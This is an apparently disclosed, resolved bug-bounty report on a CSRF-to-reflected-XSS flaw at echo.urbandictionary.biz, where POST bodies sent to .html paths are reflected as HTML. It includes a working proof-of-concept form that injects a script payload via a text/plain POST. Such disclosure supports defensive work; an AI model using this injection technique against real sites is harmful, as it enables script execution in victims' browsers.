CSRF to Reflected XSS at echo.urbandictionary.biz via spoofing content type
Medium
U
Urban Dictionary
Submitted None
Actions:
Reported by
osama-hamad
Vulnerability Details
Technical details and impact analysis
## Details
The host is vulnerable to XSS due to the fact that it does reflect any sent POST request body when the request sent to any existed/non-existed filename with .html extension which spoof the response content type to HTML.
## Proof of Concept
```
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://echo.urbandictionary.biz/xsxsxs.html" method="POST" enctype="text/plain">
<input type="hidden" name=" <script>alert(document.domain)</script>" value="" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
```
{F1343026}
## Impact
Typical cross site scripting impact, Injecting malicious javascript code into victim browser.
Report Details
Additional information and metadata
State
Closed
Substate
Resolved
Submitted
Weakness
Cross-site Scripting (XSS) - Stored